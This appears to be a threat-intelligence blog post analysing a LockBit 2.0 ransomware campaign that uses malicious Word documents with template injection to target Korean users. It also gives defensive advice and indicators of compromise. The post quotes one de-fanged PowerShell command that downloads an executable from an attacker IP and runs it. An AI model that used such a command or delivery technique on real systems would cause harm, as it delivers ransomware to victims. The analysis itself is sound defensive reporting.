LockBit 2.0 Ransomware Resurfaces

Threat Actor Targeting Korean Users through malicious Document Files

Cyble Research and Intelligence Labs (CRIL) recently discovered an ongoing campaign associated with the notorious ransomware group LockBit.

LockBit has been actively operating since September 2019 and consistently employs various methods to spread its malware. These tactics include distributing phishing emails containing malicious files, utilizing drive-by downloads, and exploiting vulnerabilities in the remote desktop protocol (RDP). As a result, LockBit has established itself as a prominent and active threat actor in the realm of ransomware.

The LockBit ransomware group utilizes a double extortion technique to enhance their likelihood of obtaining ransom payments from victims. This technique encompasses multiple stages, including data encryption to render victim data inaccessible and threats to release stolen data on designated leak sites. By employing this approach, the group aims to exert significant pressure on victims, compelling them to comply with their demands and pay the ransom.

LockBit ransomware’s maldocs campaign, initially detected in 2022, had specifically targeted individuals in Korea. In their latest campaign, LockBit has once again embraced the approach of disseminating malware through malicious document files targeting Korean individuals. Notably, the group utilized the same template injection techniques to deliver their payload.

The figure below depicts the delivery method employed by the LockBit ransomware group.

Figure 1 – Lockbit’s Delivery Mechanism

Technical Analysis

For analysis purposes, we have taken a specific sample (sha256: 7391bbd59330e79f8ee4a01e5ed20df5ab183737f2b91f926b649facd8d2d278) which is a .docx file commonly known as Office Open XML (OOXML). OOXML files are essentially packaged ZIP archives that consist of multiple XML files called parts. These parts contain various properties that collectively determine the document’s display and processing. Within these parts, certain properties may reference shared public resources accessible through online URLs.

It is also observed that the original filenames of the identified .docx samples were written in the Korean language.

The below image shows the malicious document.

Figure 2 – malicious document

Upon opening the malicious document, it attempts to establish a connection with the remote server to retrieve the subsequent component of the attack. This process involves multiple stages of execution.

In the initial stage, a URL hosting the malicious template file (.dotm) is injected into settings.xml.rels file that resides within the document package. This enables the document to fetch the .dotm file from the remote server required for further actions. This technique employed by the attackers aligns with CVE-2017-0199.

The below image shows the extracted content of the document file.

Figure 3 – Extracted content of docx file

The below figure displays the contents of the settings.xml.rels file, highlighting the inclusion of a malicious URL and the presence of the Target mode within the settings.xml.rels file.

Figure 4 – settings.xml.rels file content

Once a successful connection to the remote server is established, a malicious template file is downloaded and executed. The downloaded template file contains an obfuscated VBA macro. TAs have opted for this technique due to its ability to bypass detection mechanisms. Unlike traditional methods that rely on suspicious indicators such as macros, this technique does not require their presence in the document until the malicious template is retrieved.

The image below displays the de-Obfuscated VBA content from the downloaded template file.

Figure 5 – De-obfuscated macro content

The VBA script incorporates a PowerShell command mentioned below to trigger the retrieval of the final stage payload, which is an executable file named “tinytask.exe” from the remote server.

Following the successful download, the script saves the obtained payload in the directory “C:\Users\Public\456trytgre3e45yrthtgr.exe” on the compromised system and proceeds to execute it.

  • cmd /c powershell/W 01 curl hxxp://91[.]107[.]210[.]207/tinytask.exe -o C:\Users\Public\456trytgre3e45yrthtgr.exe; C:\Users\Public\456trytgre3e45yrthtgr.exe”

The downloaded payload is Lockbit ransomware 2.0.  

LockBit Ransomware:

After the LockBit ransomware successfully executes on a system, it initiates a series of actions. These actions include encrypting files with .lockbit extension, modifying Windows automatic backups by deleting shadow copies using vssadmin.exe, disabling startup repairs using the bcdedit tool, and more.  

The below figure shows the encrypted files with the .lockbit extension.

Figure 6 – Encrypted files & Extensions

Additionally, the ransomware leaves a ransom note that provides detailed instructions for making the required payment, as shown in the below figure.

Figure 7 –  Lockbit’s Ransom note

We recommend referring to our previous blog post to comprehensively examine LockBit 2.0 and Lockbit 3.0 ransomware.


The Lockbit ransomware has taken a surprising turn by adopting the old strategy of distributing its payload through malicious documents. This shift in behavior has caught us off guard, making it difficult to predict the motives behind this change. However, it is evident that Lockbit remains a significant threat, continuously evolving and expanding its capabilities. Therefore, users must remain vigilant and adopt robust security measures to protect against potential Lockbit ransomware attacks.

Cyble Research & Intelligence Labs continuously monitor ransomware campaigns and will keep updating our readers with the latest information.

Our Recommendations

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:

Safety Measures Needed to Prevent Ransomware Attacks

  • Conduct regular backup practices and keep those backups offline or in a separate network.
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices wherever possible and pragmatic.
  • Use a reputed anti-virus and Internet security software package on your connected devices, including PC, laptop, and mobile.
  • Refrain from opening untrusted links and email attachments without verifying their authenticity.

Users Should Take the Following Steps After the Ransomware Attack

  • Detach infected devices on the same network.
  • Disconnect external storage devices if connected.
  • Inspect system logs for suspicious events.

Impact of Ransomware

  • Loss of Valuable data.
  • Loss of the organization’s reputation and integrity.
  • Loss of the organization’s sensitive business information.
  • Disruption in organization operation.
  • Financial loss.

MITRE ATT&CK® Techniques

Tactic Technique ID Technique Name 
Command and Scripting Interpreter  
User Execution
System Information Discovery     
File and Directory Discovery
Defense EvasionT1070Delete shadow drive data
 Data encrypted for impact  
Inhibit System Recovery
Command and controlT1071Application Layer Protocol

Indicators of Compromise (IOCs)

Indicators Indicator  
7391bbd59330e79f8ee4a01e5ed20df5ab183737f2b91f926b649facd8d2d278 462e39e554bd3abb9ecdcec92d861b315f1efb77
Sha256  Sha1
Malicious docx file
d833c23bad7b1988832524bce8a6355c97d031bb3852f671e52fdf9024bd6ec0 32a155dbb9652dd88ae41044e342c1ef92f7e6f2
Malicious docx file
78db865edcf1bcd27b765c458ef1675233b11947dfceef7c45fdd254ae514a3f 2a6df9fa510af4d3e7fde1002ad54c5576abbc07
Malicious .dotm file
8022060ef633e157518037122a6003813cc0a3066d456a1164275a211efc8f5c 32a155dbb9652dd88ae41044e342c1ef92f7e6f2
Lockbit ransomware

Comments are closed.

Scroll to Top